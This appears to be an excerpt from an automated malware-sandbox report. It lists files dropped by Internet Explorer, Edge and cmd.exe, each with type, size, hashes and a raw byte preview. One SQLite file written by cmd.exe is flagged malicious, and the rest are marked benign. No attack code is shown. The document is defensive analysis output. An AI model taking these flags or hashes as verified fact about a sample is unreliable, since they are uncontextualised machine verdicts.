                                Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..7.<z...N...=M6Ku.H.'P.#.k&..kt..R.....B..p).9.......4X..Y....!AZ.ty.....f.....4.........^V.H..{....J...`+6....x........m...G'.)..>.....j.i~1t\....rW.z+Imu...*zz..TOS.O...l..>$&.o...Z.yl....8....z2F=AS^Y.SP.G.m7.ZI?h.oc..el..9.}.I.F..?.3j....Y.2-.w.H.$...u.........o.........+K.....u=7.....t..4.V.$h....*}.H..Y.%....<G.i.,.w.A..O.7......?`......r....?.E.

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\SSSPDJYD\vendors.79af82f3c5b028c7ea81[1].js

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (44421), with NEL line terminators
                                Category:dropped
                                Size (bytes):196564
                                Entropy (8bit):5.416918453049597
                                Encrypted:false
                                SSDEEP:3072:5yggyMjcPJF7iol0cQtK7bKXZ7x7/3DwLqsop:5yggUJN3CE7cZ7MnQ
                                MD5:87B6340D5C378650AB6B6DBFC2FCC200
                                SHA1:42625DD447DD664F0078D831A020BED9A71A92A1
                                SHA-256:27F89E7501CE8BF61E542F918284E6DDA03C31ADE11BD4B2174AE34D50EAABB3
                                SHA-512:1BE5C0AD1109FF789A1D1A7D1145C1421E756A26D7350F512C0434DFF1422477EA36DA6BE886556CAD37B75ACA5942A10E6E71761A87263151419451487E5EE6
                                Malicious:false
                                Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["vendors"],{29558:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},74322:function(t){t.exports=function(t){if("function"!=typeof t)throw TypeError(String(t)+" is not a function");return t}},25135:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t)&&null!==t)throw TypeError("Can't set "+String(t)+" as a prototype");return t}},6664:function(t,e,r){var n=r(23362),o=r(35093),i=r(79549),a=n("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},99027:function(t,e,r){var n=r(58306).charAt;t.exports=function(t,e,r){return e+(r?n(t,e).length:1)}},57699:function(t){t.exports=function(t,e,r){if(!(t instanceof e))throw TypeError("Incorrect "+(r?r+" ":"")+"invocation");return t}},45150:function(t,e,r){var n=r(26397);t.exports=function(t){if(!n(t))throw TypeError(String(t)+" is not an object");retur

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\AA12I8qo[1].png

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):1287
                                Entropy (8bit):7.753286328828527
                                Encrypted:false
                                SSDEEP:24:Qkmkb13K52UTcyiUJlRq85hww6qJyPGbh166BaK23P:Qkm613KsE+oLDBrJyPGbD66d23P
                                MD5:9B8059391E9315D157357A18A6A0191B
                                SHA1:C466111C02D867C05CD522F2F362CFC23FA22B9C
                                SHA-256:379BC8D28440A12EA8A540917610C7B6A2B865CDA7275285FF922D69CF46B5E7
                                SHA-512:CB19000C7425C1CF8DDA9A8D10DC220D4961D34AD9B837E4DABF2C649D57223F0497D344671782E4F4782BDAD82B06CE702E27D67F2176168DA619985BAC5848
                                Malicious:false
                                Preview:.PNG........IHDR...`...`.....m..o....IDATx..]l.U..........MD.ra.h-.c....?.F.T....@..ik......6.......pC....x%....DJk.......x..-.......$.......w..U........ :R..)....@.b .1...HA.. .R..)....@.b .1P..P.<.,+.nB].p&H].rI....G...D..<..V...~;...z..w..?..%V.~c.z...B..=(.z._V.3.=\.)..-%......w1.]e..8.P7....kC.j.......nhT+.H..B4(..Zg..$J....I.W..:{..S....VC...74.....^,..6X.....8.jX.W.._.~E.....w. .....e..x...kB....z...3..?..m...z....d.......g.D....n...q;GNo.3N|...%.._V.i~.....!.@p.E.k.[.(..D.lW......$H..Q$A./Z....jz.K........-.G8A.B5....P........q..-.a.)..u.U.a."..../..4.Q..X.....{........$, . .....+)...^..+.U..fz. ...-$.....#n..j_..z.Pe..O....ts....w..B.........F7..(Zq1...{.q..w.._.,.Zk......T.H....,.<.h.g.>...........f......%7...l*T.&..ykrr:Vo.S...f....S..~#j..A1........C9I':.......t..NO.......,..b..e}g..I[c..7..Y...B/.@...8}.....!...7.b..N.c.......m.pz.E....8...... =p$..A..s.K.......M...B:...q..W.O.`...;....E.......{.P..... ......-.....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\AA13rZME[1].png

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):436
                                Entropy (8bit):7.18858527233746
                                Encrypted:false
                                SSDEEP:12:6v/78/vX/5q+5UqmyzAn0TBlJPgk/AwL7jCCDsoQ:NX/5q2XvTBt9L7ZDG
                                MD5:5D148DE03EB9EB2C6297C4914C674EB8
                                SHA1:C5B7CC2436A49E5C0A92E05EE18B0FBE75D61FDF
                                SHA-256:BEA40AB0237ED221B313DEE3EF74594B8369C5B8F52474D87EF0BB6F0D40C997
                                SHA-512:9841B2B22E883ED8DB5CF79A4E04BB61723DE82AC1085BEA755220A2EE5A43D8C2EBECCC99000A4E5774F867AE99BF36BAD8C96A57A838AE90A83C05C7DEB95F
                                Malicious:false
                                Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d...IIDAT8O...+....q.*..R.....e9.....e.J..d.....+..(...l......,?Z..RB)....\.Y.........y.4.Z@..._E.....A...ae..y..QD..".m..z.e...y:.3..T........_..d.r......~.|.1)..ih.NR.0Q*.c...i.v.J.........%*......~....~........+1...x|.y..@.h4..0....:CW...#<.^iv...x.?:.$|.tA......xoAy.....Qc..L...C.a..e..]...-.....!.M..O..~A..g...S+>c.~0>....IEND.B`.

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\AAVs9cU[1].png

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):1214
                                Entropy (8bit):7.599946746969644
                                Encrypted:false
                                SSDEEP:24:C/6yU0JRXs1C1zE9hrbmbvTiT9je3iMUEFCONRXTQUBwFaG7:C/6yU0XXu9xRje3FCOfDQCwFak
                                MD5:840EDBF110A8FF1F0D9CA580AC5EEAC3
                                SHA1:322B7EC2E8848CE0701323C95EBE68CBC911987F
                                SHA-256:278AF8DB05B358D4A77C18906379F458402D3E0B4A905A51A5C8A05CA5A7FA6F
                                SHA-512:A2E378275DFFAED9996262AB82F13EA701A9CA75E50EFEEF1DC09398D5E0B78C64ED12AE0BA7BB579E71AF70ED1D46F54E86F3B93189DC520A8B221539043DFD
                                Malicious:false
                                Preview:.PNG........IHDR...`...`......w8....pHYs.................sRGB.........gAMA......a....SIDATx...n.9....H.:.p.N..2@.n4O0.Y...f.b.l.-...H..n!... .t.....7-../.oy6.|9e..cG.....!DE.DF.DF.DF.DF.DF.DF.DF.DF.DF.DF.DF.D...D.v....T0......q...ML.{r...@n0.c.P.}.../R...{^.S....?.aR._pt.1....5....ko\..G.F..y..Nw.W."e.!.Z....a57..,.&.}..{.....X.. eZ!.<....H.V..>.......N;2`g...w.:....o?6.ja.z..R.^.[|...F\u/C-.#u...?|....w.O.B...._.y....`.^.y.X.o...B.......[.10/.6..S......A-.~=..<%.^.....n._..H..]*.q.P.`...B- T..._.........:X..`.C..d...|.&...[..k+E'>......SQ.;m...0...p.0....4aF....f$5......P3.P=..P....j@..X......[..7ze.0A) .z.....uH....j@....s.....<.n..3..0.u..6...&.;..q.05.....N..{.....P.l....LA........@..`./.B...........q...d%.....>xo#.=.......7.=..........8...\..\.|..k.-..*...f..l......`...Sp.uy...`.G..}`.7.......J........1.:4..O.]0.9P.........#.C.C!.....{....;.+....#...a.M..e.."F......7..&.;.1C... ..M.Q(.........! p.......p.g.......9.I?..N.s@...]..I^..}.....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\BB1m6THH[1].jpg

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):7.253800605824277
                                Encrypted:false
                                SSDEEP:384:fSf1VoejXU4OVmxqt9/5QI+xKg7kPDV6l:fSdVoeo4OVmpI+xKZx6l
                                MD5:FD7CD7851CE0AE3B1952F97FA2BDB16B
                                SHA1:E2A9BF5B5D9D8185380782C471E7C9E064504A54
                                SHA-256:7A17395DF16D2E2E80CE65C1974D8BBF64EB8A979E5FA411B0BCB9B30B4E04BC
                                SHA-512:55841E2433DB36052E80B5AB62D5B132A69FC4FE1D91D827B468A2939262A76ECB9010870C9C091F6AFE856F0B371574F3D4A10C5F077A463B50259ECFF040F3
                                Malicious:false
                                Preview:......JFIF.....`.`..........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..........................................................................................................................................................................................................................?....\..8g...(...0...b....]......g...h.7.b....Q..X..d...H...........;.G..|'...mR+..7..s4.........)E.c.o...........4.}...I..N......-.D..U...&.._Iu..].....-.V$._.(.p..kU..FNv.`...K`..N...]K)..fa..R.L.3Ob....iwI=..0.G..H.}.....L....7.....Y..{.....mC...y.p.CK.+.C......w...M=t........h.,.....>.:].....7..\[..2..X.2:.C.8 ..........~4..........;P.rh....c......'.&Q.d.R.h{..C.....

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\Icon[1].png

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):533
                                Entropy (8bit):7.415663553371965
                                Encrypted:false
                                SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                Malicious:false
                                Preview:.PNG........IHDR...<... .....N.......pHYs.................sRGB.........gAMA......a.....IDATx..=O.1....$....1..7.....p32..)..Yw..p..IL.$qT'......1.#.h..j.5...9...~...w.....oe.....]8,..|..........``.$a.K.&Lq........D,D..8e.c.....fQ...u..%.(..b..8A......,>@6....Y*...9.(...d7........,!zr.N...T}.....j...NY'..|.=N2Q&<?3....@..-.e.h....F#..2.v...n..!-.e..&........%.e........y.c.y,.e........4'40.t"...B.........D.../[D..6j....^>.....g...3...5<Hv.H../M.+Y`.......OXw<a.al..aF.@.../.E....=;S.K....s.......IEND.B`.

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\desktop-shape[1].png

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):197
                                Entropy (8bit):5.986656121330302
                                Encrypted:false
                                SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                MD5:34760615AB0C180EB4B48739297FD0F2
                                SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                Malicious:false
                                Preview:.PNG........IHDR.............e.t.....pHYs.................sRGB.........gAMA......a....ZIDATx......@.EA.`...U..1\.......X]...G..{..HU.4Uj.`..O .3;..\..!3...q....[s./.@@..p...>.`(k..2.....IEND.B`.

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\th[1].jpg

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):12347
                                Entropy (8bit):7.960292048518906
                                Encrypted:false
                                SSDEEP:192:SLg3Wnh/hzjvu3aWFHNjWTld1ZM82IAzb4eb6GWdjNh4M7QHhiiC:Ss3WnFhvvaFtjwlhM8K4eYeiQ2
                                MD5:C687C0BEF3C339F9EFC56F89C7BA7C52
                                SHA1:93B06190A67025924EA4F305F3D05718B06AD4C4
                                SHA-256:38C2012AA5372E17CA49C4719E1ADB88455666353063C59E91594A19682A6663
                                SHA-512:1B26C5D737D01E914352543F1FAEE5229085EDA80F0CD62EAB386C4ADB4B4CC94D3C5077C602477679BDE117EBB4F7BF511B95B1DEFF7A77D6A3D09BAD378C7D
                                Malicious:false
                                Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....B.H.D9^zVg..YZ,.>l.Ev.z.S..(..p~<...2..S^.eF.H)G...T..e..<."[x}Ha...:..{y.............^..."..s.y.Z.z..F..h.....2s..g2.*2....ki..z.....V.....FkKE..$....S...{9=....'.m.[.5.....U..h..t.~...+|...s......v}._E...V.-7....{y.Kb..u....d.j.wQEr._".]a.9....pj.......<W.......U....hu.p..Z*TC..b...<..K..kv.......Z.....=.TW...D....7..;...^.ydl..t5.x....#.../...M.

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\th[2].jpg

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):17124
                                Entropy (8bit):7.949943883996383
                                Encrypted:false
                                SSDEEP:384:SNbLAYJZ5YpLgMaLtBnIk5Y+wNO+Vq/V1F/9YQGZGC:S17hYLgMPoONO+I/B9YNV
                                MD5:768C3AA9CEC3F9472CD150608CAB485E
                                SHA1:EA06EAEE8912735D63C682F7638EDDE2E431F7C8
                                SHA-256:281BA99CD8A386485CBD919CDCAD0ECFA2E218030871716E29E3DD6BC5570B1F
                                SHA-512:56864A34150DFF880DFD5621D49552147A7DE09DF08BDAC79C01065F974EFA14A0D422FFB66F60F866C3D4F9B1AA595573F5EDDF59B15DBD85F6DCCD57B4ECA3
                                Malicious:false
                                Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..0.).Q_|.5..Q@..Q@..Q@..Q@..Q.z.m%vTb.%....Sm..M.4P.d.?.....q.<W..f....y...Q.+.....^.V.......?...z+B.A.-...f@3...q.._.5....(.)VW.$.....0.Q.Rpo.....AE.V..QE..QE..QE..QE!8.....7.].s.p=...f....|..R....Z(....Q@..Q@.J.....v......Z......qL........8.a.zQ.zQ..P..zQ.zQ..P..zQ.zQ..P..zU..k.U-m!gUo..F.q...U..d.o,.f..}}=.sCA...D.... r?....x..j..[.....U..cj+.z/W....gY.H.......G}

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\UWAZKKMP\th[3].jpg

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):25539
                                Entropy (8bit):7.965375269158827
                                Encrypted:false
                                SSDEEP:384:SN7BKJeUOgLUy5ZoeVrQ+qP0O39yROY8atvSLpfnQTfJC9PbSZMimlQwI1T6RnC:S3KQUVYyIeVrYP0e9fwvSQTQbizVgC
                                MD5:E1156678D28FE780290C3A910E5893FD
                                SHA1:FDA56E6EB3824D274388F3BAC226FBF698E0A79A
                                SHA-256:A30AC57B0A6EC571B7EEFFECC001F849CA3B41B495D7276453FE7A9331E22C99
                                SHA-512:D67B75B4E5BDB1237DF29407427F432138508958E667A8696980EAB387BADDA9ECB7FBCCD145ACB996A1AB35734C0887D393CADBD78C126546B46D27DC438BD4
                                Malicious:false
                                Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....{d.I.6.|.[.C..pIa.m.:b.~.k...[..5K[...i...@.d.:...0<.p:.+.>.......uyaU...8.M...Ki.X.....q......^.../.Y..iv..6*.K....Xf`..G8...r9c.......t....*.....{..>...K.....Gl%xQ.N.#r...=2F{_......b.I}&.d..IYm.yq..|.u.u....]...9.k.][G.{..G.w.D..In]6.P..%..Tt...V..>".H/bm5...d.!.UfQ..G~.qIbc_X..J..H.5..s{}..bl.(Q..7..X..h..7L.......Y..C{.j{.>t$.`.....P7..O.k>.Q.......M.....-..

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):49120
                                Entropy (8bit):0.0017331682157558962
                                Encrypted:false
                                SSDEEP:3:Ztt:T
                                MD5:0392ADA071EB68355BED625D8F9695F3
                                SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\0b9182d6-5d92-4117-b30d-b495511f0477.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.

                                C:\Users\user\AppData\Local\Temp\5007de73-74e2-43bd-977a-3d1a8b067eaa.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):101423
                                Entropy (8bit):7.716355979337822
                                Encrypted:false
                                SSDEEP:3072:bBOJCAanDR3nNsalT7oxqnjyx+RjGj3XH6pN6n:9OJ78DRdsQgxqjQ+LEn
                                MD5:6457B577795F5C8949055DA3A8D3AB2E
                                SHA1:515B61672FE5F3B2A78B7A64D7B83FADAF43E4E0
                                SHA-256:52434403B00CD4AD818162921EB958AB318F2EAED1041CC0EB7216F97A63E950
                                SHA-512:DA6F36047A99BFB7D3E942BC1AD5F935EF9913899765A39E0B29CB117AB706948AB38AD5FA468507AECFB39612DA9C3C0E18C707496AF498390B00184CE61622
                                Malicious:false
                                Preview:Cr24....d.........0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........N..s...._?1n.'..S.rk........S........E..%..N.U.3.....7.)A.[z.&..)._....{._A.Wj.;.dxDo.G.n..>{J.Qn..h.....|......5.~.....{oOJ.2):...$.R=CVb.3.3....(..*.q..e.yg..vI...s..C.,..Qw..K/.......%.....R5......Q....W....V..5..2i|c9.....%Y.....e....;\.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!......o..K..K_TS....b.....i..... s.Re3B.g.;x[sb..)2.........u...".$............oo.:...h..G....yW......?..h.0-.ChC...|....]...q..T)m....k......CV...<..K..?....k.......YU?......W.Wy.......?........AS..!.m.f].f...q..9....JSmEr.......T/Rd...Y....j.....H.s......~...)l.o.g...)....K......x.....1bp.....uyG.....B

                                C:\Users\user\AppData\Local\Temp\DB1

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.8553638852307782
                                Encrypted:false
                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                MD5:28222628A3465C5F0D4B28F70F97F482
                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                Malicious:true
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\a716bd7e-5cb7-4e12-aa9d-35e6a246db82.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):11185
                                Entropy (8bit):7.951995436832936
                                Encrypted:false
                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                Malicious:false
                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.380128229721059
                                Encrypted:false
                                SSDEEP:6:YEcPgr1ZsP56s/ucPgr1WknAhRDTKpJvxQJjDrwv/ucPgr1TFkRGcp56s/C:YNw056s/bwWknAh6dx0Dkv/bwKwcp56R
                                MD5:DF29889AE904F69E9B4C35D1ABF308B4
                                SHA1:F68E5C4C87650C5B6C84E660126EF3F449668F73
                                SHA-256:96583C375A11D9CD4831F2ACBC49C2514310405B80BF1C5D67B55D3FA03DE668
                                SHA-512:C9C12A8E4645B7780565C88C458A7838469A5990EB15D8A7CBAF186908952E464ACD16F00971FE9CEC3965F20FE2684C10AA919695C435281F68F63B0E16B206
                                Malicious:false
                                Preview:{"logTime": "0527/064243", "correlationVector":"Pp6vK3czpGcivFdy3gftyX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0527/064243", "correlationVector":"CF3ABA04F33D471F806C201C2C50AB6C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0527/064243", "correlationVector":"zAvZ1Ve+Lk5FaTZ3hfzK3d","action":"EXTENSION_UPDATER", "result":""}.

                                C:\Users\user\AppData\Local\Temp\d1c3ab9b-93e5-4c03-9040-0153389535c8.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_1346560684\CRX_INSTALL\_metadata\verified_contents.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1753
                                Entropy (8bit):5.8889033066924155
                                Encrypted:false
                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                MD5:738E757B92939B24CDBBD0EFC2601315
                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                Malicious:false
